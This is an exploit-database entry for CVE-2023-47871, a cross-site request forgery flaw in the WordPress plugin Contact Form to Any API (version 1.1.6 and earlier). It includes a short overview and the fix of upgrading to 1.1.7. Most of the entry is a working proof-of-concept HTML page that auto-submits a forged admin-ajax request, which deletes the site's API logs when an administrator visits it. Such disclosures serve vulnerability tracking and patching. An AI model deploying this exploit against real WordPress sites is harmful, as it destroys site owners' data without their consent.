Lucene search

K
zdtArvandy1337DAY-ID-39192
HistoryDec 12, 2023 - 12:00 a.m.

WordPress Contact Form To Any API 1.1.6 Cross Site Request Forgery Vulnerability

2023-12-1200:00:00
Arvandy
0day.today
124
wordpress
contact form
csrf
vulnerability
api
security
update
recommendation
exploit

7.1 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

# Exploit Title: WP Plugins Contact Form to Any API <= 1.1.6 - CSRF
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/
# Vendor Homepage: https://www.itpathsolutions.com/
# Version: 1.1.6
# Tested on: Windows, Linux
# CVE: CVE-2023-47871

# Product Description
Contact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.

# Vulnerability overview
The Wordpress plugins Contact Form to Any API <= 1.1.6 is vulnerable to Cross-Site Request Forgery in the Delete All Log function. This vulnerability could lead to unauthorized deletion of API Logs.

# Proof of Concept
<html>
<body>
<form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="cf7_to_any_api_bulk_log_delete" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>

# Recommendation
Upgrade to version 1.1.7

7.1 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

Related for 1337DAY-ID-39192